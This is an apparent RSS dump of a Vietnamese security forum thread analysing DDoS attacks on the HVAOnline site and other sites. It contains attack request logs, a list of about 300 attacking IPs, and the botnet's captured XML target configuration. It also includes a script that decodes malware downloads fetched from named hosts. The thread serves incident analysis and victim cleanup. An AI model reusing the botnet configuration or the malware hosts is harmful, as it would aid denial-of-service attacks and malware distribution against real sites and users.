117.2.133.220 - - [10/Aug/2011:05:55:49 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefo
x/3.6.6"
117.2.133.220 - - [10/Aug/2011:05:55:49 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefo
x/3.6.6 (.NET CLR 3.5.30729)"
118.71.104.37 - - [10/Aug/2011:06:02:53 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fe
dora/3.6.7-1.fc14 Firefox/3.6.7"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 Cent
OS/3.6-3.el5.centos Firefox/3.6.7"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729)"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6"
222.254.71.201 - - [10/Aug/2011:06:42:14 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firef
ox/3.6.6 (.NET CLR 3.5.30729)"
222.254.71.201 - - [10/Aug/2011:06:42:14 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firef
ox/3.6.6 GTB7.1"
222.254.71.201 - - [10/Aug/2011:06:42:14 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
58.187.43.64 - - [10/Aug/2011:08:44:25 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fed
ora/3.6.7-1.fc13 Firefox/3.6.7"
222.252.147.137 - - [10/Aug/2011:09:24:06 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.
62 Version/11.00"
222.252.147.137 - - [10/Aug/2011:09:24:06 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 
Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.22.144.231 - - [10/Aug/2011:10:40:50 -0500] "GET /toforum HTTP/1.1" 403 861 "/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari
/535.1"
113.169.217.196 - - [10/Aug/2011:11:08:52 -0500] "GET /tof/ HTTP/1.1" 403 861 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; BTRS35926; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.3072
9; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"
113.169.217.196 - - [10/Aug/2011:11:08:52 -0500] "GET /tof/ HTTP/1.1" 403 861 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; BTRS35926; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.3072
9; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"
Nói chung là chỉ bấy nhiêu thứ. Cứ lòng vòng hết referer này đến User-Agent kia.]]>
/hvaonline/posts/list/39641.html#244892 /hvaonline/posts/list/39641.html#244892 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)". Sau đây là danh sách 300 IP dữ dằn nhất (chủ yếu là từ VN). Nếu anh chị em nào thấy có IP của mình nằm trong danh sách này, xin vui lòng liên hệ trực tiếp với tôi qua PM. Cám ơn. 113.160.101.152 113.160.110.89 113.160.111.68 113.160.112.43 113.160.148.100 113.160.24.98 113.160.3.158 113.160.62.142 113.161.144.221 113.161.144.222 113.161.161.249 113.162.118.128 113.162.120.225 113.162.120.35 113.162.136.65 113.162.137.26 113.162.201.143 113.162.203.171 113.162.218.73 113.162.221.140 113.162.237.57 113.162.248.116 113.162.248.176 113.162.248.209 113.162.64.100 113.162.64.97 113.162.88.154 113.162.92.184 113.162.92.60 113.162.96.16 113.162.96.202 113.162.96.22 113.162.96.26 113.162.96.44 113.165.11.90 113.165.183.227 113.165.185.149 113.165.210.208 113.165.213.239 113.165.222.43 113.165.223.100 113.165.243.169 113.165.244.36 113.165.244.57 113.165.253.240 113.166.13.192 113.166.134.90 113.166.174.89 113.166.19.140 113.166.212.203 113.166.62.66 113.166.77.219 113.167.102.164 113.167.102.49 113.167.106.144 113.167.109.203 113.167.111.21 113.167.112.209 113.167.117.124 113.167.1.20 113.167.123.181 113.167.123.73 113.167.126.44 113.167.144.170 113.167.153.122 113.167.153.205 113.167.168.19 113.167.168.5 113.167.178.245 113.167.202.192 113.167.207.47 113.167.208.253 113.167.209.21 113.167.209.94 113.167.2.65 113.167.3.191 113.167.39.145 113.167.94.141 113.168.106.93 113.168.110.22 113.168.111.184 113.168.11.154 113.168.113.127 113.168.125.98 113.168.156.238 113.168.183.7 113.168.187.180 113.168.188.65 113.168.189.45 113.168.213.248 113.168.223.169 113.168.223.193 113.168.236.10 113.168.30.104 113.168.5.124 113.168.69.212 113.168.78.218 113.168.81.193 113.168.90.12 113.168.93.111 113.171.100.89 113.171.105.139 113.171.107.41 113.171.108.66 113.171.133.9 113.171.144.115 113.171.152.147 113.171.169.241 113.171.170.46 113.171.194.29 113.171.48.221 113.171.51.30 113.171.55.96 113.171.61.79 113.171.63.254 113.172.153.174 113.172.164.11 113.172.48.198 113.178.15.8 113.178.27.56 113.179.226.57 113.179.70.3 113.179.7.178 113.179.88.201 113.185.2.158 113.185.2.164 113.185.2.172 113.190.0.204 113.190.133.37 113.190.160.27 113.190.161.137 113.190.16.114 113.190.162.127 113.190.169.15 113.190.181.3 113.190.19.33 113.190.196.218 113.190.238.11 113.190.32.86 113.190.35.165 113.190.4.25 113.190.53.176 113.190.63.215 113.190.72.251 113.190.81.18 113.190.81.42 113.190.82.143 113.190.83.169 113.190.83.196 113.190.84.4 113.190.87.58 113.190.88.183 113.190.92.37 113.190.95.27 113.22.118.5 113.22.2.133 113.22.24.212 113.22.50.216 113.22.61.106 113.22.80.244 115.72.230.84 115.73.230.165 115.73.36.67 115.74.125.27 115.78.12.116 115.78.232.189 116.118.63.28 117.0.173.228 117.0.20.186 117.2.60.13 117.2.60.15 117.4.156.191 117.4.156.227 117.4.157.229 117.4.46.198 117.4.59.90 117.4.94.87 117.6.135.123 117.6.2.245 118.46.118.141 118.68.199.51 118.68.221.147 118.68.43.5 118.68.44.69 118.69.224.56 118.69.35.89 118.69.74.4 118.70.127.31 118.70.131.212 118.71.109.141 118.71.147.27 118.71.190.145 118.71.23.52 118.71.29.134 118.71.51.231 118.71.58.34 119.194.59.186 121.132.61.222 123.16.104.109 123.16.107.131 123.16.118.44 123.16.119.204 123.16.119.222 123.16.12.227 123.16.161.157 123.16.163.186 123.16.167.160 123.16.173.104 123.16.202.192 123.16.204.12 123.16.208.16 123.16.220.39 123.16.221.66 123.16.222.150 123.16.223.194 123.16.25.196 123.16.72.11 123.16.74.131 123.16.76.131 123.16.96.125 123.17.139.76 123.17.145.91 123.17.152.29 123.17.153.62 123.17.157.44 123.17.158.58 123.17.159.33 123.17.188.180 123.17.192.203 123.17.229.208 123.17.255.238 123.18.112.145 123.18.123.152 123.18.134.33 123.18.146.128 123.18.146.77 123.18.150.246 123.18.178.213 123.18.188.154 123.18.221.129 123.18.244.132 123.18.77.19 123.18.79.158 123.18.82.16 123.19.173.118 123.19.21.117 123.19.251.146 123.19.255.141 123.19.27.218 123.19.46.44 123.20.164.93 123.20.197.131 123.20.228.191 123.20.232.191 123.20.39.120 123.20.54.148 123.21.139.77 123.21.253.65 123.22.166.41 123.23.32.237 123.24.108.235 123.24.110.140 123.24.112.193 123.24.131.81 123.24.140.129 123.24.19.212 123.24.194.103 123.24.202.22 123.24.208.85 123.24.216.224 123.24.219.41 123.24.233.147 123.24.233.167 123.24.235.62 123.24.240.27 123.24.31.84 123.24.33.207 123.24.35.215 123.24.50.183 123.24.5.233 123.24.63.147 123.24.63.228 123.24.8.162 123.24.9.69 123.25.238.45 123.26.140.28 123.26.147.184 123.26.193.95 123.26.253.11 123.26.30.194 123.26.45.234 123.26.53.224 123.26.54.142 123.26.70.130 123.26.70.169 123.26.71.234 123.26.94.131 123.27.112.92 123.27.12.87 123.27.144.40 123.27.153.165 123.27.158.162 123.27.182.142 123.27.190.31 123.27.211.24 123.27.221.92 123.27.226.190 123.27.28.138 123.27.32.33 123.27.75.235 123.27.77.254 123.27.80.5 123.30.9.250 14.160.52.134 1.53.61.68 1.55.132.7 1.55.18.55 1.55.221.175 1.55.223.131 1.55.9.53 175.215.110.55 180.10.34.227 183.182.127.28 183.81.56.218 183.81.75.61 183.91.12.221 183.91.2.142 183.91.4.249 183.91.4.72 183.91.7.64 202.151.164.52 203.162.168.103 203.210.152.170 203.210.155.214 203.210.204.52 221.185.92.211 222.252.101.156 222.252.103.132 222.252.106.152 222.252.107.118 222.252.108.39 222.252.113.177 222.252.113.40 222.252.115.72 222.252.118.246 222.252.137.50 222.252.147.184 222.252.171.124 222.252.196.215 222.252.198.194 222.252.198.32 222.252.213.195 222.252.215.205 222.252.215.62 222.252.217.88 222.252.223.2 222.252.24.121 222.253.77.101 222.254.103.6 222.254.104.232 222.254.11.179 222.254.12.105 222.254.126.34 222.254.140.91 222.254.141.186 222.254.18.243 222.254.25.224 222.254.4.63 222.254.4.69 222.254.58.23 222.254.61.193 222.254.64.179 222.254.72.102 222.254.73.232 222.254.76.76 222.254.82.226 222.254.8.38 222.255.6.83 27.2.102.103 27.74.131.21 27.74.66.222 42.118.232.59 42.119.231.218 58.186.16.128 58.187.111.253 58.187.56.20 58.187.96.164 66.110.121.148 71.21.15.74]]> /hvaonline/posts/list/39641.html#244912 /hvaonline/posts/list/39641.html#244912 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244923 /hvaonline/posts/list/39641.html#244923 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244925 /hvaonline/posts/list/39641.html#244925 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

softforpc wrote:
Anh PXMMRF, cho em hỏi cái phần mềm anh dùng ở hình 6a để theo dõi connections có tên là gì vậy? 
ở hình 6a thì đó không phải là Wireshark. Tôi không rõ chính xác ứng dụng mà bác PXMMRF dùng, nhưng có thứ tương đương là TCPView của sysinternals ( đã bị Microsoft mua lại ), kết hợp thêm Process explorer cũng của sysinternals thì bồ sẽ có 1 bộ toolbox khá tốt để nhanh chóng nhận định sự tồn tại của một process lạ đang cố tạo các kết nối mạng đáng ngờ]]>
/hvaonline/posts/list/39641.html#245012 /hvaonline/posts/list/39641.html#245012 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245014 /hvaonline/posts/list/39641.html#245014 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

stylish_man wrote:
Chà lơ ngơ thế nào máy mình lại nhiễm mớ sandboxies, đang SYN request mấy trang blog rầm rầm thế này Huhu bắt đền anh TQN 
Mèn, sao lại đòi TQN đền là sao? Chính bồ "lơ ngơ" mà lại đòi bắt đền người khác. Thôi thì cứ theo những hướng dẫn trong chủ đề này mà diệt mớ malware đó. Cách dễ nhất là download Avira và dùng nó để remove mớ malware này.]]>
/hvaonline/posts/list/39641.html#245016 /hvaonline/posts/list/39641.html#245016 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 wrote:
- Em cũng đang sài Hệ Điều Hành 6k đó anh, anh có thể chỉ em làm cách nào để phát hiện chú "quản trị cấp hệ thống"  
{spam} Hì. Vừa đây mình có cài để test bản Windows server 2008 32bit lên virtualbox, đĩa hàng chợ của một ông bạn làm cùng. Nó tự xuất hiện trong "User Panel" luôn nên không cần "cheat" gì phức tạp. Username là "fengge" nâng quyền từ Standard lên Administrator. Mình thử cài KAV 6.0 (bản server) quyét thì có ra 1 mớ trojan và đã diệt được, nhưng 1 thời gian sau "fengge" lại xuất hiện (sau khi bị mình xoá). Không biết có phải trên môi trường virtualization thì KAV chạy không tốt hay không. Cuối cùng, theo bản năng, mình đập luôn cái VM đó để sau này khỏi lăn tăn...

crc32 wrote:
....để em góp phần tiêu diệt đám stl? 
À, ý là mình là do tiện thể nói đến những nguồn malware khả dĩ ở VN thôi, chứ chắc đám "STL" gì gì đó không liên quan tới nguồn này. Hihi {/spam}]]>
/hvaonline/posts/list/39641.html#245017 /hvaonline/posts/list/39641.html#245017 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245019 /hvaonline/posts/list/39641.html#245019 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245038 /hvaonline/posts/list/39641.html#245038 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://net.iadze.com/backgrounds.jpg: Code:
http://danlambaovn.blogspot.com
 http://www.aihuuphuyen.org
 http://nguoiduatinkami.wordpress.com
 http://vrvradio.com
 http://danlambaovn.disqus.com
 http://aotrangoi.com
 http://viettan.org
 http://dangviettan.wordpress.com
 http://radiochantroimoi.com
 http://radiochantroimoi.wordpress.com
 http://bandoclambao.wordpress.com
Backgrounds.jpg đã bổ sung thêm một số website "lề trái" khác để DDOS. 2. Server: second.dinest.net không respond = "WTF" nữa, lần này lại tiếp tục trả về hai file xv.jpg và xc.jpg: xv.jpg: 2011-08-15 04:47:58 xc.jpg Code:
<targets>
<item enabled="1" threads="5" delay="2" method="GET" protocol="http" host="www.hvaonline.net" port="80" rootURI="/" uri="/hvaonline/forums/list.html" keepCookies="1" crawling="0" referer="/tof/">
<runners>
<item uri="/" referer=""/>
<item uri="/toforum" referer="/"/>
<item uri="/hvaonline/forums/list.html" referer="/tof/"/>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.x-cafevn.org" port="80"  uri="/" keepCookies="1" crawling="0" referer=""/>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.tienve.org" port="80"  uri="/" keepCookies="1" crawling="0" referer=""/>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.viettan.org" port="80"  uri="/" keepCookies="1" crawling="0" referer=""/>
</runners>
</item>
</targets>
HVA ta vẫn tiếp tục bị DDOS. Thòng thêm x-cafevn.org, tienve.org, viettan.org. Theo ý của tôi thì lần này ngoài mục đích chính là HVA, con AcrobatUpdater.exe mới còn đánh thêm một loạt các website # đặt chung trên cùng server của HVA. Ý đồ là muốn cho cả server này sụp ???? Phải nói là em quá ngán ngẫm với mấy anh stl này rồi, lạy mấy anh đấy, mấy anh quá lỳ lợm, chai mặt, không biết xấu hổ vừa vừa chứ ! Mấy anh cứ tìm mọi cách che dấu, bưng bít thông tin đối với người dân Viet Nam ta à. Chắc mấy anh muốn chiến tranh nổ ra mà mọi người dân không biết để không kịp đề phòng, để mất nước à ? PS: Xuống miền Tây đi đám, tình cờ ngồi chung bàn với một ông công an tỉnh của một tỉnh miền Tây, ổng nói một câu: Sáng giờ phải chạy lo tiếp cái đám công an Trùng Khánh TQ qua giao lưu kết nghĩa. Em không nói gì, chỉ thán một câu: hết biết ?????????????????????????????]]>
/hvaonline/posts/list/39641.html#245041 /hvaonline/posts/list/39641.html#245041 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245042 /hvaonline/posts/list/39641.html#245042 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Bro TQN thử check xem bọn STL có làm không nhé]]>
/hvaonline/posts/list/39641.html#245043 /hvaonline/posts/list/39641.html#245043 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245046 /hvaonline/posts/list/39641.html#245046 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. ít nhất là 1 botnet khác chưa bị phát hiện. Chắc chắn các zombies vẫn còn nhiễm một thứ tương tự như "AcrabatUpdater.exe". Từ cuối 2009 đến nay, các bạn stl đã spam quá nhiều .exe giả .doc và hàng chục (nếu như không phải hàng trăm ngàn) em bị dính chấu. PS: các bạn bên vietnamnet nếu cần góp ý kỹ thuật, xin liên hệ trực tiếp với tôi qua PM.]]> /hvaonline/posts/list/39641.html#245048 /hvaonline/posts/list/39641.html#245048 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com) của HTTP GET request của con bot nằm vùng trên máy nạn nhân cũng chưa xác định được. Năm ngoái, mẫu: GoogleCrashHandler.exe chính là bot nằm vùng của stl để DDOS VietnamNet. Trên máy bạn nào có GoogleCrashHandler.exe vui lòng upload lên giùm để các anh em khác phân tích, kiểm tra. Hoặc bạn cũng có thể dùng Wireshark hay SmartSniff để monitor xem nó connect về đâu lấy thông tin DDOS, đang DDOS bằng HTTP protocol vào website nào ? Dưới đây là đoạn 010Editor script nhỏ để decode file top.jpg và flash.swf mà GoogleCrashHandler tải về để tiếp tục download con bot AcrobatUpdater.exe Code:
//----------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeTopJpg.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode file top.jpg downloaded from http://penop.net/top.jpg
// This file can decode fake flash file downloaded from http://poxxf.com/flash.swf too.
//--------------------------------------------------------------------------------------------------
int i, j, size = FileSize();

if (size <= 0)
{
    MessageBox(idOk, "DecodeTopJpg", "No file loaded or file empty.");
    return -1;
}

// Modify from 8th byte
for (i = 8,  j = 0; i < size; i++, j++)
{
    // Modify the current byte
    WriteUByte(i, ReadUByte(i) ^ ReadUByte(4 + j % 4));
}
Cảm ơn các bạn !]]>
/hvaonline/posts/list/39641.html#245050 /hvaonline/posts/list/39641.html#245050 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245051 /hvaonline/posts/list/39641.html#245051 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245054 /hvaonline/posts/list/39641.html#245054 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Cảm ơn aminhan ! File của bạn là file sạch, của Google. Các file sạch ta có thể kiểm tra bằng cách: right click - Properties. Nếu có Tab "Digital Signatures" và trong Signature list là các công ty signer hợp lệ thì file đó 99% là sạch. Các file mạo danh của stl sẽ không có Digital Signature (chữ ký số). 
Thanks TQN. Vì mấy hôm trước thấy máy tính có nhiễm AcrobatUpdater.exe nhưng theo hướng dẫn nên delete nó hết rồi, chỉ sợ hôm nay lại bị.]]>
/hvaonline/posts/list/39641.html#245056 /hvaonline/posts/list/39641.html#245056 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245060 /hvaonline/posts/list/39641.html#245060 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245074 /hvaonline/posts/list/39641.html#245074 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245076 /hvaonline/posts/list/39641.html#245076 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245077 /hvaonline/posts/list/39641.html#245077 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Theo mình nghĩ không nên mang chuyện triết lý và đạo đức để phê phán nhóm STL , vì dẫu sao họ cũng làm việc theo lý tưởng, theo mục đích sống của họ dẫu có thể đó là mù quáng. ở 1 góc độ nào đó thì cũng phải cảm ơn họ vì họ mà những người nhiệt huyết và có tâm như TQN cũng như BQT HVA đã mở mang kiến thức cho mọi người từ trình độ it basic đến advance hiểu thêm về virus và các biện pháp bảo vệ, vốn dĩ những kỹ thuật RC chỉ lưu hành nội bộ. Chỉ thực sự khi nào họ ngã ngựa trên con đường họ đang đi và bởi chính đức tin họ đang theo đuổi làm họ ngã thì có thể họ cảm nhận được và hiểu ra vấn đề. PS mình rất thích anh TQN châm chọc STL bằng kỹ thuật và những phân tích. 
@mv1098 : quả thật những lời nói "nhẹ nhàng" và "điềm đạm" của bạn thật dễ nghe; nhưng những điều dễ nghe, những lời iêu thương chưa chắc đã là sự "cứu dỗi" cho những linh hồn với những mớ "lý tưởng " phá hoại kiểu trẻ nít này chắc bạn cũng đồng ý với tôi điểm này. kô mang họ ra mổ xẻ lên án ở đây thì đợi đến khi mùa quyt' sang năm và mang ra diễn đàn trẻ nít để mắng mỏ tụi nhỏ này sao??? ]]>
/hvaonline/posts/list/39641.html#245078 /hvaonline/posts/list/39641.html#245078 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Chắc chắn stl vẫn còn ít nhất là 1 botnet khác chưa bị phát hiện. Chắc chắn các zombies vẫn còn nhiễm một thứ tương tự như "AcrabatUpdater.exe". 
Từ sáng đến giờ vào không được, tranh thủ vào buổi tối (vì nghĩ rằng buổi tối các máy bị botnet ở VN tắt máy nên trang HVA không bị DDOS) Hy vọng các bạn có thể phát hiện ra các botnet khác để có thể cảnh báo cho người dùng khác nhằm chấm dứt cái trò đuổi tìm này. Tks conmale, TQN,... LVD]]>
/hvaonline/posts/list/39641.html#245079 /hvaonline/posts/list/39641.html#245079 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

myquartz wrote:
Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn... 
Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ? Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn). Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám? Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy!]]>
/hvaonline/posts/list/39641.html#245084 /hvaonline/posts/list/39641.html#245084 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

myquartz wrote:
Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn... 
Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ? Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn). Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám? Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy! 
Mình đồng ý với conmale và các quản trị HVA khác! Dẫu thế giới mạng có thật giả lẫn lộn, kẻ đen - người trắng nhưng bạn phải tin vào lý trí của mình, lý tưởng của mình. Những người như bạn comale, TQN... đang làm tất cả để bảo vệ ngôi nhà HVA, bảo vệ lý tưởng của HVA, bảo vệ niềm tin - niềm tin vào chính nghĩa. Cảm ơn vì tất cả! ]]>
/hvaonline/posts/list/39641.html#245087 /hvaonline/posts/list/39641.html#245087 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245090 /hvaonline/posts/list/39641.html#245090 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245091 /hvaonline/posts/list/39641.html#245091 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

